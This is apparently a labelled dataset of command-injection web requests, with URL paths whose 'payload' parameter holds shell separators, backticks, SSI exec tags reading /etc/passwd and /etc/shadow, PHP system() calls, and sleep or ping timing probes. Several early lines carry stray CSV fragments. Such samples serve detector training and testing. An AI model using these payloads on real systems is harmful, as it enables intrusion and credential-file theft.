/path0/path1/path2/path3/?payload=+|+dir+c:",10,cmdi,anom $+|+dir+c:"
/path0/?payload=&&+|+dir c:",12,cmdi,anom $&&dir c:"
/path0/path1/?payload=+dir+c:",8,cmdi,anom $&&dir+c:"
/path0/path1/path2/path3/?payload=+|+dir+c:/
/path0/path1/path2/path3/?payload=$+|+dir+c:/
/?payload=&&+|+dir c:/
/path0/path1/path2/?payload=$&&dir+c:/
/path0/path1/path2/?payload=+dir+c:/
/path0/?payload=+dir+c:+|
/?payload=+|+dir+c:+|
/path0/path1/path2/?payload=+|+dir+c:/+|
/?payload=dir+c:",7,cmdi,anom ||+dir|c:"
/?payload=<!--#exec cmd="/bin/cat /etc/passwd"-->
/path0/path1/?payload=<!--#exec cmd="/bin/cat /etc/shadow"-->
/path0/path1/path2/path3/?payload=<!--#exec cmd="/usr/bin/id;-->
/path0/?payload=/index.html|id|
/path0/path1/path2/?payload=;id;
/path0/?payload=;id
/?payload=;netstat -a;
/path0/path1/path2/path3/?payload=|id
/path0/path1/path2/path3/?payload=|/usr/bin/id
/path0/path1/path2/?payload=|id|
/path0/path1/?payload=|/usr/bin/id|
/path0/path1/path2/?payload=||/usr/bin/id|
/path0/?payload=|id;
/path0/path1/?payload=||/usr/bin/id;
/path0/path1/path2/path3/?payload=;id|
/path0/path1/path2/?payload=;|/usr/bin/id|
/?payload=/bin/ls -al
/path0/path1/path2/?payload=/usr/bin/id
/?payload=id
/?payload=/usr/bin/id;
/path0/path1/path2/?payload=id;
/path0/path1/?payload=/usr/bin/id|
/?payload=id|
/?payload=;/usr/bin/id
/path0/path1/path2/?payload=|usr/bin/id
/path0/path1/path2/?payload=|nid
/path0/path1/?payload=`id`
/path0/path1/?payload=`/usr/bin/id`
/path0/path1/path2/path3/?payload=a);id
/path0/path1/path2/path3/?payload=a;id
/path0/path1/?payload=a);id;
/path0/path1/path2/path3/?payload=a;id;
/path0/path1/path2/path3/?payload=a);id|
/path0/?payload=a;id|
/path0/path1/path2/path3/?payload=a)|id
/path0/path1/path2/path3/?payload=a|id
/path0/?payload=a)|id;
/path0/path1/path2/path3/?payload=|/bin/ls -al
/path0/path1/?payload=a);/usr/bin/id
/path0/?payload=a;/usr/bin/id
/path0/path1/?payload=a);/usr/bin/id;
/path0/path1/path2/path3/?payload=a;/usr/bin/id;
/path0/path1/path2/path3/?payload=a);/usr/bin/id|
/path0/path1/path2/?payload=a;/usr/bin/id|
/path0/?payload=a)|/usr/bin/id
/?payload=a|/usr/bin/id
/?payload=a)|/usr/bin/id;
/?payload=;system('cat /etc/passwd')
/?payload=;system('id')
/path0/path1/path2/path3/?payload=;system('/usr/bin/id')
/path0/path1/path2/?payload=cat /etc/passwd
/?payload=& ping -i 30 127.0.0.1 &
/path0/path1/path2/path3/?payload=& ping -n 30 127.0.0.1 &
/?payload=ping -i 30 127.0.0.1
/path0/path1/?payload=`ping 127.0.0.1`
/path0/path1/path2/path3/?payload=| id
/path0/?payload=& id
/path0/path1/path2/path3/?payload=; id
/?payload=$;/usr/bin/id
/path0/path1/?payload=asdf3334
/path0/path1/path2/?payload=; /bin/sleep 31 ;
/path0/path1/?payload='uname'
/path0/path1/?payload='false'
/path0/?payload='true'
/path0/path1/path2/?payload="`uname`"
/path0/?payload="`false`"
/?payload="`true`"
/path0/path1/path2/?payload=`uname`
/path0/path1/?payload=`false`
/path0/path1/?payload=`true`
/path0/?payload=" ; /bin/sleep 31 ;
/?payload=' ; /bin/sleep 31 ;
/path0/path1/path2/path3/?payload=| /bin/sleep 31 ;
/path0/path1/path2/path3/?payload="| /bin/sleep 31 ;
/?payload='| /bin/sleep 31 ;
/path0/path1/path2/?payload=ping.exe -n 31 127.0.0.1
/path0/path1/path2/path3/?payload=" ping.exe -n 31 127.0.0.1